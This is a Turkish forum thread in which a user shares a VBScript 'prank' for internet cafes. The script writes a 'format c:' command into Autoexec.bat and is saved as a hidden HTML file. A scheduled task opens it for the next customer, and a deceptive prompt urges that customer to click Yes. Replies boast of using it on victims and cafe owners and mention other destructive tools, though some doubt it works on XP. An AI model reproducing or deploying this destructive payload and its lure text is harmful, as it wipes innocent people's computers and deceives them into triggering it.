Gizli Format Atma [ozeLLikLe CafeciLere..]

Partizan

New member
Reaction score
0
Coding Forever Set fs = CreateObject(\"Scripting.FileSystemObject\")
Set a = fs.CreateTextFile(\"C:Autoexec.bat\", True)
a.WriteLine(\"format c: /autotest /u /q\")
a.Close
Eğer girişte açılan kutucukta \"Hayır\" \"No\" tuşuna bastıysanız
javascript:reload()\">buraya tıklayın ve \"Evet\"\"Yes\"e tıklayın.Bu internet
cafede internette daha rahat ve kesintisiz gezebilmeniz için bu işlemi yapmanız
gerekir.Lutfen bu işlemi yapınız.Aksi taktirde bilgisayardaki arka plan
programlarını kapatmanız veya hızlı bir gezinti yapamazsınız.

Bu kodları wordpad ı açıp \"cafe.htm\" şeklinde bilgisayarım/c/ ye kaydediyoruz.sağ
tık > özellikler diyoruz ve \"gizli\" seçeneğini seçiyoruz. zamanlamış görevlere
gidiyoruz ve 10 dk sonra pc den kalkacaksak 20 dk sonraya bilgisayarım/c/cafe.htm yi
açtırıyoruz. pc den kalkıyoruz. gıcık olduğumuz adam pc ye oturuyor bir ileti alıyor
evet diyor ve pc formatlanıyor. hem cafecıye hemde cocuga gecmıs olsun..

~aLintidir~

dostum partizan hiç bişey annamadım yaa.madem alıntı yaptın bari hepsini yapsaydın ya da sende bişeyler katsaydın aga.ya da alıntı yaptığın linki verseydin yahu.yukardaki komutları nereye yazıyoz.dos'a falanmı nereye üstad.biraz açıklarsan iyi olurdu be

Bu kodları wordpad ı açıp cafe.htm şeklinde bilgisayarım...
demişya arkadasım?

emeğin için sağol partizan bununla ilgili bir yorumum var daha sonra bir bak başarılar

m_y' Alıntı:
Bu kodları wordpad ı açıp cafe.htm şeklinde bilgisayarım...
demişya arkadasım?
hee.pardon ya.bu komutları ilk defa gördüm bayağı bi şaşırdım "ne yazıyo lan burda"dedim kendi kendime.ordaki komutlara odaklandığım için gerisini okumadım:Dneyse tamam.haklısınız

zuhahahha bunu wardom forumlarında görmüştüm ve yaptım.Adam ne olduğunu şaşırdı:D

Ben sana daha açık olarak yazıım kodu gerçi yeterince açıktı ama ...

Coding Forever Set fs = CreateObject(\"Scripting.FileSystemObject\")
Set a = fs.CreateTextFile(\"C:Autoexec.bat\", True)
a.WriteLine(\"format c: /autotest /u /q\")
a.Close
Eğer girişte açılan kutucukta \"Hayır\" \"No\" tuşuna bastıysanız
javascript:reload()\">buraya tıklayın ve \"Evet\"\"Yes\"e tıklayın.Bu internet
cafede internette daha rahat ve kesintisiz gezebilmeniz için bu işlemi yapmanız
gerekir.Lutfen bu işlemi yapınız.Aksi taktirde bilgisayardaki arka plan
programlarını kapatmanız veya hızlı bir gezinti yapamazsınız.

bu kodları wordpad e kaydedion! Mesela CAFE.HTM die! Sonra bunu gizliosun! Sonra zamanlanmış görewlere girip bunu 10 dk sonraya ayarlıyosun! Sonra 10 dk sonra kurban oturuyo we zamanladığımız için otomatik olarak açılıyo bu htm! We ondan dolayı sazan adam evet ı seçiyo we FORMAAATT :D

---------------------------------------

Bide bu kodlar XP de çalışıoo mu snrm WARDOM da werilmişti we o çalışmıodu ???

yazmak istemezdim ama bilmeyenleri için eklemek istiyorum bu kodlar çalışmaz haberiniz ola bununla ilgili bir arkadaşADA yazmışTIM

Saolasın partizan. Özürlü diye tabir ettiğim cafeciler vardı. Sayende intikam alıcam gavurlardan :D

javascript tanimlasini girceksin tabi basta htm olarak calistirmak icin

partizan kardeş bunlar xp de çalışmaz ki. yani xp açıkken nasıl format atacak kime atacak. senin dosyan c sürücüsünde. format atarken bu dosya silinmeyecek mi? silinirken nasıl çalışmaya devam edecek. uzun zamandır pc ile uğraşıyorum. bu komutlar ça lış maz diye düşünüyorum...

xnitrox' Alıntı:
partizan kardeş bunlar xp de çalışmaz ki. yani xp açıkken nasıl format atacak kime atacak. senin dosyan c sürücüsünde. format atarken bu dosya silinmeyecek mi? silinirken nasıl çalışmaya devam edecek. uzun zamandır pc ile uğraşıyorum. bu komutlar ça lış maz diye düşünüyorum...

Hmm.. uzun zamandir PC iLe ugrasiyorsun demek :) ama PC i iyi tanimadigini goruyorum.. HardFormatter istermisin ? cift tiklaman yeterLi format atman icin :) formatLandiktan sonra o dosyayi ararsin artik ;) biLmiyorum anLatabiLdim mi ? :rolleyes:

Yav partizan adam doğru söyLüyor . Xp'de bi htm iLe format attıramazsın 98'de oLsa hadi neyse. Gir cmd ye yaz format c: E/H evet de . yine olcağı bişi yoq. bu da buna benziyor.

CrackerTeam' Alıntı:
zuhahahha bunu ****** forumlarında görmüştüm ve yaptım.Adam ne olduğunu şaşırdı:D

reklam yapma :D tşkler paylaşımın için

Partizan' Alıntı:
Hmm.. uzun zamandir PC iLe ugrasiyorsun demek :) ama PC i iyi tanimadigini goruyorum.. HardFormatter istermisin ? cift tiklaman yeterLi format atman icin :) formatLandiktan sonra o dosyayi ararsin artik ;) biLmiyorum anLatabiLdim mi ? :rolleyes:

euheuhe doğru söylüyor. zaten format tam anlamıyla olmaz arkadaşlar kullanılan dosyalar silinmez ama windows dosyalarının çoğu gittiği içinde restart edince sistem hata verir ve pc açılmaz. biLmiyorum anLatabiLdim mi ? :rolleyes:

arkadaşlarım eğer görev yöneticisindeki tüm programların görevini sonlandırır ve kendini en başa atıp makineyi yeniden başlatırsa xp'de bile format atar.hardformatter xp ve prorat'a bu yapılmış zaten

yaaaaaaaaa hemende yaparsınız zaten cafeciler de sazan ya hiç faketmezler sıkıysa böle biri benim cafede denk gelmezkiii ya nedir bu cafecilerin sizden çektigi yaaaaa biz ekmek parası için akşama kadar sizinle ilgilenelim bide sorun çıkartın bize yuhhhhhhhhh ulan sizeeeee

ellerine saglıkda

hocam bu komut iyi hoş güzelde

winxp işe yarmaz giibi geliyor bana paylaşım icin thanks

Geri